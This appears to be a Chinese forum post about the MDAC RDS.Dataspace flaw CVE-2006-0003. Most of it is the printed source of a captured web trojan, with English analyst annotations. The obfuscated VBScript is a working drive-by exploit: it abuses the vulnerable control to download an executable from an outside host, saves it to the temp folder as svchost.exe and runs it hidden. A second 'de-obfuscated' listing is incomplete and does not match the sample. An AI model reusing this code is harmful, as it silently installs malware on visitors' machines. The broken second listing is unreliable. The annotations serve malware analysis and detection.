作者:
hcchen
Microsoft Windows MDAC 漏洞 - CVE-2006-0003:
作爲 ActiveX 數據對象 (ADO) 的一部分提供並在 MDAC 中分發的
RDS.Dataspace ActiveX 控件中存在一個遠程代碼執行漏洞。 成功利用此漏
洞的攻擊者可以完全控制受影響的系統。以下爲利用此漏洞通過網頁散播木馬的實例:
--------------------------------------------------------------------------
手機王網頁木馬原始碼:
[PHP]
<script language="VBScript">
' Obfuscated drive-by download sample (analyst annotations added; code unchanged).
' Flow visible below: create an <object> element bound to a class ID, use that
' object's CreateObject method to obtain an HTTP client, a binary stream, a
' file-system object and a shell object, then fetch a file, write it to the
' temporary folder and start it with a hidden window.
' Every sensitive string (class ID, ProgIDs, HTTP verb) is assembled from short
' fragments, presumably so static signatures on the complete strings do not match.
' Detection notes: page script that sets this classid on a dynamically created
' object element; a file named svchost.exe written to and started from the
' temporary folder; the host in "dl" as a network indicator.
' Remediation is on the platform side: the vendor fix for the CVE named on this page.

' Runtime errors are ignored, so a failing step does not interrupt the script.
on error resume next
' Download location. The "*" in the file name looks like a redaction by the
' poster rather than a literal path -- TODO confirm against the original capture.
dl="http://www.myemage.com/V20/Daren/images/*.exe"
' j1..j7 concatenate (into j8) to "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36",
' the class ID of the RDS.DataSpace control that the advisory text above refers to.
j1="clsid:"
j2="BD96"
j3="C556-"
j4="65A3-"
j5="11D0-"
j6="983A-"
j7="00C04FC29E36"
j8=j1&j2&j3&j4&j5&j6&j7
' Element name, attribute name, a ProgID and the ShellExecute verb kept in
' variables so the literals do not appear next to the calls that use them.
xx="object"
xxx="classid"
xxxx="Scripting.FileSystemObject"
dd="open"
' Build the <object> element in the DOM and bind it to the class ID above.
Set df = document.createElement(xx)
df.setAttribute xxx, j8
' b4..b14 concatenate (into strb) to "Microsoft.XMLHTTP".
b4="Mi"
b5="cr"
b6="o"
b7="soft"
b8=".X"
b9="M"
b10="L"
b11="H"
b12="T"
b13="T"
b14="P"
strb1=b4&b5&b6&b7&b8&b9
strb2=b10&b11&b12&b13&b14
strb=strb1&strb2
' All further COM objects are requested through the control's own CreateObject
' method (df.CreateObject), not through the script engine's CreateObject.
Set x = df.CreateObject(strb,"")
' a4..a15 concatenate (into strd) to "Adodb.Stream".
a4="A"
a5="d"
a6="o"
a7="d"
a8="b"
a9="."
a10="S"
a11="t"
a12="r"
a13="e"
a14="a"
a15="m"
strd1=a4&a5&a6&a7&a8&a9
strd2=a10&a11&a12&a13&a14&a15
strd=strd1&strd2
set SS = df.createobject(strd,"")
' Type 1 is adTypeBinary: the stream carries raw bytes, not text.
SS.type = 1
' f4..f6 concatenate (into stre) to "GET".
f4="G"
f5="E"
f6="T"
stre=f4&f5&f6
' Third argument False makes the request synchronous, so Send returns only
' after the response has been received.
x.Open stre, dl, False
x.Send
' File name for the dropped file; it matches the name of a legitimate Windows
' system process, which makes the process less conspicuous in a task list.
marco1="svchost.exe"
set F = df.createobject(xxxx,"")
' Special folder 2 is TemporaryFolder in the FileSystemObject API.
tmp2=2
set tmp = F.GetSpecialFolder(tmp2)
SS.open
' marco1 now holds the full path <temporary folder>\svchost.exe.
marco1= F.BuildPath(tmp,marco1)
' The HTTP response body is written to disk unmodified; save option 2 is
' adSaveCreateOverWrite, so an existing file of that name is replaced.
SS.write x.responseBody
SS.savetofile marco1,2
SS.close
' z1..z6 concatenate (into zz) to "Shell.Application".
z1="She"
z2="ll.A"
z3="ppli"
z4="cat"
z5="io"
z6="n"
zz=z1&z2&z3&z4&z5&z6
set Q = df.createobject(zz,"")
' Starts the saved file with verb "open"; the final argument 0 requests a
' hidden window, so nothing is shown to the user.
Q.ShellExecute marco1,"","",dd,0
</script>
[/PHP]
還原(去除字串拆分混淆後):
[PHP]
<script language="VBScript">
' De-obfuscated rendering of the sample shown earlier on this page, with the
' fragmented strings joined into their final values (annotations added; code unchanged).
' NOTE(review): this listing is not a line-for-line equivalent of the obfuscated
' sample. The variable xxxx is used below but never assigned here, and the
' request-open and save-to-file calls present in the obfuscated sample are
' absent. Treat the obfuscated listing as authoritative for the sample's
' behaviour and this one as a reading aid only.

' Runtime errors are ignored, so a failing step does not interrupt the script.
on error resume next
' Download location; the "*" looks like a redaction by the poster -- TODO confirm.
dl="http://www.myemage.com/V20/Daren/images/*.exe"
' Class ID of the RDS.DataSpace control that the advisory text on this page refers to.
j8="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
xx="object"
xxx="classid"
dd="open"
' Build an <object> element in the DOM and bind it to the class ID above.
Set df = document.createElement(xx)
df.setAttribute xxx, j8
' COM objects are requested through the control's own CreateObject method.
strb="Microsoft.XMLHTTP"
Set x = df.CreateObject(strb,"")
strd="Adodb.Stream"
set SS = df.createobject(strd,"")
' Type 1 is adTypeBinary: the stream carries raw bytes, not text.
SS.type = 1
' stre and dl are assigned but not used by any call in this listing.
stre="GET"
x.Send
' File name for the dropped file; it matches the name of a legitimate Windows
' system process.
marco1="svchost.exe"
' xxxx has no value in this listing (see the note at the top).
set F = df.createobject(xxxx,"")
' Special folder 2 is TemporaryFolder in the FileSystemObject API.
tmp2=2
set tmp = F.GetSpecialFolder(tmp2)
SS.open
' marco1 becomes the full path under the temporary folder.
marco1= F.BuildPath(tmp,marco1)
SS.write x.responseBody
SS.close
zz="Shell.Application"
set Q = df.createobject(zz,"")
' Verb "open"; the final argument 0 requests a hidden window.
Q.ShellExecute marco1,"","",dd,0
</script>
[/PHP]